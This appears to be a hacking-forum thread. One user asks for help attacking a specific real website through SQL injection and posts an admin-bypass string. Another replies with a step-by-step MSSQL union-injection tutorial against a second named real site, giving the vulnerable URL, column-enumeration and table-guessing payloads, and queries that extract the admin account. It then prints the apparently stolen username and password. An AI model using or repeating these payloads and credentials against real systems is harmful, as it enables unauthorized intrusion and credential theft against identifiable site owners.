next »

[massmailer]

http://www.dmkstone.com/new.asp?thickness=-2%20UNION%20ALL%20SELECT%20column_name,2%20FROM%20information_schema.columns


we can login into that site using sql injection code in admin area 1' or '1'='1
But i dont want to hack any site
i want to learn how to get table name and database name or how to upload files on this site
i tried a lot it didnt work for me
think its a test , try to work on the site
not to hack , just to learn

[lucky]

I dont know why its not working but here this might help u doing so..

yeo all ... m going to write tutorial of mssql (asp) injection ..

so in this we need , an mssql vulnerable site and abit time

so lets start i got this one
http://www.fpcci.com.pk


here is the vulnerable page of site
 http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985


so .. we can check vulnerability by using this ' sign like simple sql injection .

if our site is vulnerable we will get error like this







ok now we got the error means site is vul .. lets move to next point , now we need to find column numbers to get em we will do same like simple sql injection but we in this we will use # instead of --  at the end of out query .

so now our URL will look like

 http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 order by 1#


keep on trying this order by command till we get error like








i got error on 16 it means site have 15 colums . voila



so now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7,8,9, ......,15

in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . in my site i got table name admin so m going to use it now . now our url will look like

Code:

http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin#

after this we will get number of largest visible colum which we can use to get data from site . here i got 3,7and 6





so now we are going to use 3 to get information now all we have to do is just put the name of colum instead of 3 in string and we will get username and password ,

now our url will look like

Code:

http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,name,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#

and done we got the username here





username is

Code:

farrukh

and then change colum name with passwords colum name

Code:

http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#

you will get the password ;)here we got the password that is

Code:

fpcci#f

hopes it will help u , in this type of injection we dont get much working scripts to get tables etc if i get working ones i will update this tut soon[/b]